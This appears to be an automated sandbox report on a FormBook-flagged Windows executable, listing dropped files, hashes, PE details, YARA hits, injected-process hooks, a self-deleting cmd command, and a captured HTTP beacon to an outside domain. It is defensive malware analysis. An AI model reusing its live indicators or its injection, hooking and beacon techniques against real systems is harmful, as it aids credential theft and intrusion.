                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:27
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@7/2@3/1
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 13.3% (good quality ratio 11.9%)
                                    • Quality average: 72.2%
                                    • Quality standard deviation: 32%
                                    HCA Information:
                                    • Successful, ratio: 97%
                                    • Number of executed functions: 97
                                    • Number of non-executed functions: 154
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 52.255.188.83, 168.61.161.212, 51.11.168.160, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 51.103.5.159, 52.155.217.156, 20.54.26.129, 23.210.248.85
                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net

                                    Simulations

                                    Behavior and APIs

                                    Time | Type | Description
                                    21:24:17 | API Interceptor | 192x Sleep call for process: BLESSINGS.exe modified

                                    Joe Sandbox View / Context

                                    IPs


                                    Domains

                                    No context

                                    ASN


                                    JA3 Fingerprints

                                    No context

                                    Dropped Files


                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BLESSINGS.exe.log
                                                                            Process:C:\Users\user\Desktop\BLESSINGS.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1451
                                                                            Entropy (8bit):5.345862727722058
                                                                            Encrypted:false
                                                                            SSDEEP:24:ML9E4Ks2eE4O1lEE4UVwPKDE4KhK3VZ9pKhuE4IWUAE4KI6no84G1qE4j:MxHKXeHKlEHU0YHKhQnouHIW7HKjovGm
                                                                            MD5:06F54CDBFEF62849AF5AE052722BD7B6
                                                                            SHA1:FB0250AAC2057D0B5BCE4CE130891E428F28DA05
                                                                            SHA-256:4C039B93A728B546F49C47ED8B448D40A3553CDAABB147067AEE3958133CB446
                                                                            SHA-512:34EF5F6D5EAB0E5B11AC81F0D72FC56304291EDEEF6D19DF7145FDECAB5D342767DBBC0B4384B8DECB5741E6B85A4B431DF14FBEB5DDF2DEE103064D2895EABB
                                                                            Malicious:true
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                            C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                            Process:C:\Users\user\Desktop\BLESSINGS.exe
                                                                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):42080
                                                                            Entropy (8bit):6.2125074198825105
                                                                            Encrypted:false
                                                                            SSDEEP:384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
                                                                            MD5:F2A47587431C466535F3C3D3427724BE
                                                                            SHA1:90DF719241CE04828F0DD4D31D683F84790515FF
                                                                            SHA-256:23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
                                                                            SHA-512:E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.56178131875686
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:BLESSINGS.exe
                                                                            File size:3427840
                                                                            MD5:30cb872994e8a0a4a635b06bfbe38006
                                                                            SHA1:02e502ef79ea251f04fa9e02dd1d7639e59c7ddc
                                                                            SHA256:d0b62e121a89ba8e44b4b71a887dd80df1e4fc746dabc200854622e9ed1fa8cb
                                                                            SHA512:57bc48f7c2e77d28f13cd52dadeaa24a50a8eafb0316c2b7894e49cbe17fb16f14efe4f7b7568ef3ae40c7e6ec0a07862ec9bd91541be477795f7c113a4816d1
                                                                            SSDEEP:98304:p+F0ah/YomABaKJCmwLyxWIyzhIpJj7d29wYG:p+FPheKcqo3+V7
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..N.................B4.........~`4.. ........@.. ........................4...........`................................

                                                                            File Icon

                                                                            Icon Hash:00828e8e8686b000

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x74607e
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                            Time Stamp:0x4EC1C53F [Tue Nov 15 01:49:51 2011 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:v4.0.30319
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al

                                                                            Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x346028 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x348000 | 0x62a | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x34a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                            Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x344084 | 0x344200 | unknown | unknown | unknown | unknown | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x348000 | 0x62a | 0x800 | False | 0.35595703125 | data | 3.6771719498 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x34a000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x3480a0 | 0x3a0 | data | |
RT_MANIFEST | 0x348440 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                                            Imports

DLL | Import
mscoree.dll | _CorExeMain

                                                                            Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2008 AIBD4G:CFD:@><<=EI4<8
Assembly Version | 1.0.0.0
InternalName | BLESSINGS.exe
FileVersion | 6.9.12.16
CompanyName | AIBD4G:CFD:@><<=EI4<8
Comments | 4H793ADH@:58D93JC7C3EG
ProductName | I@J9GGA7CBDA=H:I8@
ProductVersion | 6.9.12.16
FileDescription | I@J9GGA7CBDA=H:I8@
OriginalFilename | BLESSINGS.exe

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2021 21:26:23.389085054 CET | 49755 | 80 | 192.168.2.6 | 91.195.241.137
Jan 13, 2021 21:26:23.433885098 CET | 80 | 49755 | 91.195.241.137 | 192.168.2.6
Jan 13, 2021 21:26:23.436270952 CET | 49755 | 80 | 192.168.2.6 | 91.195.241.137
Jan 13, 2021 21:26:23.436424017 CET | 49755 | 80 | 192.168.2.6 | 91.195.241.137
Jan 13, 2021 21:26:23.481056929 CET | 80 | 49755 | 91.195.241.137 | 192.168.2.6
Jan 13, 2021 21:26:23.510871887 CET | 80 | 49755 | 91.195.241.137 | 192.168.2.6
Jan 13, 2021 21:26:23.510904074 CET | 80 | 49755 | 91.195.241.137 | 192.168.2.6
Jan 13, 2021 21:26:23.511102915 CET | 49755 | 80 | 192.168.2.6 | 91.195.241.137
Jan 13, 2021 21:26:23.511132002 CET | 49755 | 80 | 192.168.2.6 | 91.195.241.137
Jan 13, 2021 21:26:23.555875063 CET | 80 | 49755 | 91.195.241.137 | 192.168.2.6

                                                                            UDP Packets


                                                                            DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 13, 2021 21:26:02.693787098 CET | 192.168.2.6 | 8.8.8.8 | 0x38ee | Standard query (0) | www.toweroflifeinc.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:26:23.308008909 CET | 192.168.2.6 | 8.8.8.8 | 0xa42b | Standard query (0) | www.quintred.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:04.839895010 CET | 192.168.2.6 | 8.8.8.8 | 0x9d11 | Standard query (0) | www.hotvidzhub.download | A (IP address) | IN (0x0001)

                                                                            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 13, 2021 21:26:02.767628908 CET | 8.8.8.8 | 192.168.2.6 | 0x38ee | Name error (3) | www.toweroflifeinc.com | none | none | A (IP address) | IN (0x0001)
Jan 13, 2021 21:26:23.383419991 CET | 8.8.8.8 | 192.168.2.6 | 0xa42b | No error (0) | www.quintred.com |  | 91.195.241.137 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:04.901885986 CET | 8.8.8.8 | 192.168.2.6 | 0x9d11 | Name error (3) | www.hotvidzhub.download | none | none | A (IP address) | IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • www.quintred.com

                                                                            HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49755 | 91.195.241.137 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 21:26:23.436424017 CET | 4866 | OUT | GET /jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P HTTP/1.1
                                                                            Host: www.quintred.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
Jan 13, 2021 21:26:23.510871887 CET | 4866 | IN | HTTP/1.1 302 Found
                                                                            date: Wed, 13 Jan 2021 20:26:23 GMT
                                                                            content-type: text/html; charset=UTF-8
                                                                            content-length: 0
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_T0oGji8ZbUDKitk7mvz/5w6qRssSn9oqweHEj3JMisRyq1Qoa/dizZly+qRNB2xY3VlNem/76Rnt308qbdhrGw==
                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            pragma: no-cache
                                                                            last-modified: Wed, 13 Jan 2021 20:26:23 GMT
                                                                            location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=quintred.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                                            x-cache-miss-from: parking-6d4775b86f-szbgp
                                                                            server: NginX
                                                                            connection: close


                                                                            Code Manipulations

                                                                            User Modules

                                                                            Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                                                            Processes

                                                                            Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE2
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE2
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE2
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE2

                                                                            System Behavior

                                                                            General

                                                                            Start time:21:24:12
                                                                            Start date:13/01/2021
                                                                            Path:C:\Users\user\Desktop\BLESSINGS.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\BLESSINGS.exe'
                                                                            Imagebase:0x710000
                                                                            File size:3427840 bytes
                                                                            MD5 hash:30CB872994E8A0A4A635B06BFBE38006
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            General

                                                                            Start time:21:24:47
                                                                            Start date:13/01/2021
                                                                            Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                            Imagebase:0xb60000
                                                                            File size:42080 bytes
                                                                            MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Antivirus matches:
                                                                            • Detection: 0%, Metadefender, Browse
                                                                            • Detection: 0%, ReversingLabs
                                                                            Reputation:moderate

                                                                            General

                                                                            Start time:21:24:52
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:
                                                                            Imagebase:0x7ff6f22f0000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:21:25:13
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\SysWOW64\raserver.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                            Imagebase:0xd90000
                                                                            File size:108544 bytes
                                                                            MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:moderate

                                                                            General

                                                                            Start time:21:25:17
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
                                                                            Imagebase:0x2a0000
                                                                            File size:232960 bytes
                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:21:25:18
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff61de10000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Disassembly

                                                                            Code Analysis

                                                                              Executed Functions

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ($<$ntin
                                                                              • API String ID: 0-2777557274
                                                                              • Opcode ID: 2ebc36496d0f4db59145c4817e7100993ba0fab69ff7cfe62c73289e0de8def8
                                                                              • Instruction ID: 912591c198bf3d1f2cbb6ba473a6439bb28f9113ef48c8309cb335b2bedb05b8
                                                                              • Opcode Fuzzy Hash: 2ebc36496d0f4db59145c4817e7100993ba0fab69ff7cfe62c73289e0de8def8
                                                                              • Instruction Fuzzy Hash: 8EA2A274E04219CFDB18CF99C981ADDBBF2BF89304F2581A9D508AB355D734AA81CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ($<$ntin
                                                                              • API String ID: 0-2777557274
                                                                              • Opcode ID: 92f8eb4ca1d41fafab254c9516e2c4116085ccc6fb307c742dc047cf32eaf3ea
                                                                              • Instruction ID: f65f44b5017f42fa581d99bc49145bc0beeed36743faf2b432b595c8994ee571
                                                                              • Opcode Fuzzy Hash: 92f8eb4ca1d41fafab254c9516e2c4116085ccc6fb307c742dc047cf32eaf3ea
                                                                              • Instruction Fuzzy Hash: 87A2B274E042199FDB14CF99C981BDDFBB2BF89300F24D1AAD508AB255D734A982CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: <$@
                                                                              • API String ID: 0-1426351568
                                                                              • Opcode ID: e3f700d9a7eebb6768d8225985d0f9c4284faaab7b253ec7dd2dd3d3f38060f6
                                                                              • Instruction ID: 8ffa9a5f7adc3d8dd8ef2226201db7cb4755e12d05b0fb203e17df106361610a
                                                                              • Opcode Fuzzy Hash: e3f700d9a7eebb6768d8225985d0f9c4284faaab7b253ec7dd2dd3d3f38060f6
                                                                              • Instruction Fuzzy Hash: 4C62AD74A00229CFDB68CFA9C984A9DFBF2BF48714F19C5A9D408AB311D734A985CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: jN
                                                                              • API String ID: 0-1675516797
                                                                              • Opcode ID: 36b49c638ff4a3116e33934d9454d2d381b564c6761e6622b428bb5d9dcf1fcf
                                                                              • Instruction ID: 4395f6883d9a6bf313a839b83fe6a8ac13e1339d6f180629de728560b5741ff5
                                                                              • Opcode Fuzzy Hash: 36b49c638ff4a3116e33934d9454d2d381b564c6761e6622b428bb5d9dcf1fcf
                                                                              • Instruction Fuzzy Hash: EE32CF74A00219CFDB54DBA5C988ACEFBB2BF48715F55C5D6C408AB215CB30E985CFA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2c76325cec40f4e3838517c313cb475a701071891c4526c49284a29460fd9cc3
                                                                              • Instruction ID: 0f804e78f638e192c593d7008fe4e822f9aff26e9af7a543b43d63492b0f8929
                                                                              • Opcode Fuzzy Hash: 2c76325cec40f4e3838517c313cb475a701071891c4526c49284a29460fd9cc3
                                                                              • Instruction Fuzzy Hash: E7828174A00209CFCB1ACF68D898AAEBBF2FF49314F158969E5059B3A1D730ED51CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0117A507
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0117E607
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              Uniqueness

